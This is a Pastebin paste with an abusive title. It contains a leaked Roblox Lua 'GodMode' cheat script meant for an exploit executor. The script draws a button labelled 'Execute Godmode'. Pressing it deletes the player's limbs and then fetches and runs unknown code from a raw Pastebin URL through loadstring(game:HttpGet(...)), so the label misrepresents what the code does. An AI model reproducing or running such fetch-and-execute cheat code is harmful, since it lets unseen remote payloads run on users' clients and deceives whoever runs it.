Advertisement
d2rq

FUCK YOU LYR YOU THINK THIS SCRIPT IS WORTH ANYTHING??!

Jul 16th, 2020
54
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.51 KB | None | 0 0
  1. -- GodMode By Lyrxda#8271 (BANNED)
  2. -- Leaked by StreamSniperx#9182
  3.  
  4. -- Instances:
  5.  
  6. local ScreenGui = Instance.new("ScreenGui")
  7. local main = Instance.new("Frame")
  8. local TextLabel = Instance.new("TextLabel")
  9. local TextButton = Instance.new("TextButton")
  10.  
  11. --Properties:
  12.  
  13. ScreenGui.Parent = game.CoreGui
  14. ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
  15.  
  16. main.Name = "main"
  17. main.Parent = ScreenGui
  18. main.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  19. main.Size = UDim2.new(0, 1267, 0, 60)
  20. main.Active = true
  21. main.Draggable = false
  22.  
  23. TextLabel.Parent = main
  24. TextLabel.BackgroundColor3 = Color3.fromRGB(0, 255, 255)
  25. TextLabel.Position = UDim2.new(-0.0134175215, 0, 0, 0)
  26. TextLabel.Size = UDim2.new(0, 1284, 0, 60)
  27. TextLabel.Text = "Thanks for using my godmode"
  28. TextLabel.TextColor3 = Color3.fromRGB(0, 0, 0)
  29. TextLabel.TextSize = 20.000
  30. TextLabel.TextWrapped = true
  31.  
  32. TextButton.Parent = main
  33. TextButton.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  34. TextButton.Position = UDim2.new(0.883188605, 0, 0, 0)
  35. TextButton.Size = UDim2.new(0, 148, 0, 60)
  36. TextButton.Font = Enum.Font.SourceSans
  37. TextButton.Text = "Execute Godmode"
  38. TextButton.TextColor3 = Color3.fromRGB(255, 0, 0)
  39. TextButton.TextScaled = true
  40. TextButton.TextSize = 14.000
  41. TextButton.TextWrapped = true
  42. TextButton.MouseButton1Down:connect(function()
  43. game.Players.LocalPlayer.Character["Right Arm"]:Remove()
  44.  
  45. wait (0.5)
  46.  
  47. game.Players.LocalPlayer.Character["Right Leg"]:Remove()
  48. loadstring(game:HttpGet('https://pastebin.com/raw/26rxEvAq'))()
  49. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement